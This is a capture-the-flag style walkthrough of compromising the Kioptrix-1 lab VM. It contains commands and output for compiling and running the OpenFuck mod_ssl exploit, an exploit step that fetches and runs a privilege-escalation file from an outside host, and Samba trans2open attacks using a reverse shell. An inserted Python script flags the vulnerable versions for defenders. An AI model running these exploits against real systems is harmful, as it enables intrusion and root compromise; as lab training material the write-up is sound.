Kioptrix-1

Set the Kioptrix-1 VM's network adapter to NAT, and set Kali's adapter to NAT as well.

After booting, the target VM looks like this:

If the target machine cannot be scanned: edit the VMX configuration file, change the "bridged" entries inside it to "nat", but leave the last "bridged" alone. Try it; if that does not work, change the last "bridged" to "nat" as well.

Confirming the target IP

We need the target's IP address, so scan for live hosts.

Information gathering

sudo nmap -sn 192.168.170.0/24

192.168.170.1 is the adapter's default gateway, not the target we are looking for. Likewise, 192.168.170.2 and 192.168.170.254 are gateway addresses that are never handed out to hosts by default, and .134 is Kali's own IP. That leaves 192.168.170.135 as the target.
![[Pasted image 20230328195909.png]]

Next, a more thorough scan of the target:

sudo nmap -sC -sV -v -p- -A 192.168.170.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-28 08:05 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Initiating ARP Ping Scan at 08:05
Scanning 192.168.170.135 [1 port]
Completed ARP Ping Scan at 08:05, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:05
Completed Parallel DNS resolution of 1 host. at 08:05, 0.01s elapsed
Initiating SYN Stealth Scan at 08:05
Scanning bogon (192.168.170.135) [65535 ports]
Discovered open port 80/tcp on 192.168.170.135
Discovered open port 111/tcp on 192.168.170.135
Discovered open port 139/tcp on 192.168.170.135
Discovered open port 443/tcp on 192.168.170.135
Discovered open port 22/tcp on 192.168.170.135
Discovered open port 1024/tcp on 192.168.170.135
Completed SYN Stealth Scan at 08:05, 7.03s elapsed (65535 total ports)
Initiating Service scan at 08:05
Scanning 6 services on bogon (192.168.170.135)
Completed Service scan at 08:05, 11.03s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against bogon (192.168.170.135)
NSE: Script scanning 192.168.170.135.
Initiating NSE at 08:05
Completed NSE at 08:05, 10.64s elapsed
Initiating NSE at 08:05
Completed NSE at 08:05, 0.04s elapsed
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Nmap scan report for bogon (192.168.170.135)
Host is up (0.00079s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8746cdbfd8be666e92a2bdf5e6f6486 (RSA1)
|   1024 8f8e5b81ed21abc180e157a33c85c471 (DSA)
|_  1024 ed4ea94a0614ff1514ceda3a80dbe281 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2023-03-28T13:07:44+00:00; +1h01m52s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-09-26T09:32:06
| Not valid after:  2010-09-26T09:32:06
| MD5:   78ce52934723e7fec28d74ab42d702f1
|_SHA-1: 9c4291c3bed2a95b983d10acf766ecb987661d33
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: 400 Bad Request
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:95:4A:C2 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.007 days (since Tue Mar 28 07:56:17 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: 1h01m51s
|_smb2-time: Protocol negotiation failed (SMB2)
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   KIOPTRIX<00>         Flags: <unique><active>
|   KIOPTRIX<03>         Flags: <unique><active>
|   KIOPTRIX<20>         Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   MYGROUP<00>          Flags: <group><active>
|   MYGROUP<1d>          Flags: <unique><active>
|_  MYGROUP<1e>          Flags: <group><active>

TRACEROUTE
HOP RTT     ADDRESS
1   0.79 ms bogon (192.168.170.135)

NSE: Script Post-scanning.
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.70 seconds
           Raw packets sent: 65572 (2.886MB) | Rcvd: 65551 (2.623MB)

The target has ports 80 and 443 open, so try browsing to them.
![[Pasted image 20230328201108.png]]
Both ports serve the same default page and reveal nothing more. Look closely at the nmap results instead: the web server version is http-server-header: Apache/1.3.20, and the SSL stack on port 443 is mod_ssl/2.8.4 OpenSSL/0.9.6b.

Finding an exploit

Method 1

Visit the Exploit Database site (Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers, exploit-db.com) and search for mod_ssl.

Download the source

Download the code locally and rename it OpenFuck.c.

Before compiling, read the comments in the source; they usually tell you how the file is meant to be used and compiled. Compile as the comments instruct:

gcc -o OpenFuck OpenFuck.c -lcrypto

If compilation fails, install the following library and compile again:

apt-get install libssl-dev

What it looks like after compiling:

Run ./OpenFuck with no arguments to print the executable's usage instructions.

Method 2 (following a more experienced author's approach)

┌──(root kali)-[~/Desktop]
└─# searchsploit mod_ssl      
------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                              |  Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                                             | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                                  | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                        | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                  | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                  | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow                | unix/remote/40347.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Comparing against mod_ssl/2.8.4, three entries match this version; test them one by one.

Testing shows that unix/remote/47080.c works, so copy it out:
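As an added triage example (not part of the original write-up), this Python script reads the service lines from the nmap output above and flags the legacy items a defender should remediate before an attacker reaches this stage. The version thresholds (mod_ssl < 2.8.7, OpenSSL < 0.9.6d) are taken from the searchsploit titles on this page; the sample lines are copied from this scan, and the `triage` function and its finding strings are my own.

```python
import re
from datetime import datetime

# Constructed sample: service lines copied from the nmap -sV output for 192.168.170.135 above.
NMAP_SAMPLE = """\
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| Signature Algorithm: md5WithRSAEncryption
| Not valid after:  2010-09-26T09:32:06
|   SSLv2 supported
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
"""


def parse_version(s):
    """'2.8.4' -> (2, 8, 4) so versions compare numerically, not as strings."""
    return tuple(int(x) for x in s.split("."))


def triage(nmap_text, now=datetime(2023, 3, 28)):
    """Return a sorted, de-duplicated list of findings for the given nmap service lines.

    Thresholds come from the searchsploit entries on this page: mod_ssl < 2.8.7 and
    OpenSSL < 0.9.6d. OpenSSL 0.9.6 letter releases are compared by their suffix letter.
    """
    findings = []
    for line in nmap_text.splitlines():
        m = re.search(r"mod_ssl/(\d+\.\d+\.\d+)", line)
        if m and parse_version(m.group(1)) < (2, 8, 7):
            findings.append(f"mod_ssl {m.group(1)} < 2.8.7 (known remote buffer overflow)")
        m = re.search(r"OpenSSL/(\d+\.\d+\.\d+)([a-z]?)", line)
        if m and (parse_version(m.group(1)), m.group(2)) < ((0, 9, 6), "d"):
            findings.append(f"OpenSSL {m.group(1)}{m.group(2)} < 0.9.6d (SSL2 KEY_ARG overflow)")
        if "Server supports SSHv1" in line:
            findings.append("SSHv1 enabled (deprecated protocol)")
        if "SSLv2 supported" in line:
            findings.append("SSLv2 enabled (deprecated protocol)")
        if "md5WithRSAEncryption" in line:
            findings.append("certificate signed with MD5")
        m = re.search(r"Not valid after:\s+(\S+)", line)
        if m and datetime.fromisoformat(m.group(1)) < now:
            findings.append(f"certificate expired {m.group(1)}")
    # Ports 80 and 443 report the same mod_ssl/OpenSSL banner, so collapse duplicates.
    return sorted(set(findings))


if __name__ == "__main__":
    for f in triage(NMAP_SAMPLE):
        print("FINDING:", f)
```

Feeding it the lines of a patched host (mod_ssl 2.8.7 or later, OpenSSL 0.9.6d or later, no SSHv1/SSLv2) returns an empty list, which is the state to aim for.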

┌──(root kali)-[~/Desktop]
└─# locate unix/remote/47080.c
/usr/share/exploitdb/exploits/unix/remote/47080.c
                                                                                                                                              
┌──(root kali)-[~/Desktop]
└─# cp /usr/share/exploitdb/exploits/unix/remote/47080.c ./

Then compile it with gcc:

┌──(root kali)-[~/Desktop]
└─# gcc -o exploit 47080.c -lcrypto
47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录
   21 | #include <openssl/ssl.h>
      |          ^~~~~~~~~~~~~~~
compilation terminated.

It errors out. A quick Baidu search shows that a development package is missing.

Install it with apt:

┌──(root kali)-[~/Desktop]
└─# apt-get install libssl1.0-dev

Then compile again:

┌──(root kali)-[~/Desktop]
└─# gcc -o exploit 47080.c -lcrypto
                                                                                                                                              
┌──(root kali)-[~/Desktop]
└─# ls
47080.c  exploit

Run it:

┌──(root kali)-[~/Desktop]
└─# ./exploit                                                                                                                        

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./exploit target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)

Running it shows the usage, but we still need the target identifier that matches the server version:

┌──(root kali)-[~/Desktop]
└─# ./exploit | grep apache-1.3.20                                                                                                        1 ⨯
        0x02 - Cobalt Sun 6.0 (apache-1.3.20)
        0x27 - FreeBSD (apache-1.3.20)
        0x28 - FreeBSD (apache-1.3.20)
        0x29 - FreeBSD (apache-1.3.20+2.8.4)
        0x2a - FreeBSD (apache-1.3.20_1)
        0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
        0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
        0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
        0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
        0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
        0x7e - Slackware Linux 8.0 (apache-1.3.20)
        0x86 - SuSE Linux 7.3 (apache-1.3.20)

Two entries match the banner, 0x6a and 0x6b; test each of them.

┌──(root kali)-[~/Desktop]
└─# ./exploit 0x6a 192.168.170.135 -c 40

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8070
Ready to send shellcode
Spawning shell...
Good Bye!

0x6a fails; now try 0x6b.

┌──(root kali)-[~/Desktop]
└─# ./exploit 0x6b 192.168.170.135 -c 40

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81e8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--09:32:52--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!

Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$ 
bash-2.05$ whoami&&id
whoami&&id
apache
uid=48(apache) gid=48(apache) groups=48(apache)

0x6b gets a shell. It should have escalated straight to root, but the privilege-escalation script never downloaded because the exploit could not establish an SSL connection to the site hosting it. For a workaround, see this post: vulnhub Kioptrix: Level 1 (#1)_仙女象的博客-CSDN博客

Privilege escalation

Use the smb_version auxiliary scanner module to identify the Samba version.


Then use the exploit/linux/samba/trans2open module in msf:

use exploit/linux/samba/trans2open
set payload linux/x86/shell_reverse_tcp
show options
set rhosts 192.168.170.135
exploit

Alternatively, go to the Exploit Database site and search for samba 2.2.x; the entry "Samba < 2.2.8 (Linux/BSD) - Remote Code Execution - Multiple remote Exploit" (exploit-db.com) has the exploit. Compile and run it manually, substituting your Kali IP and the target IP:

gcc 10.c -o smb
./smb -b 0 -c kali_ip target_ip

This yields a root shell.
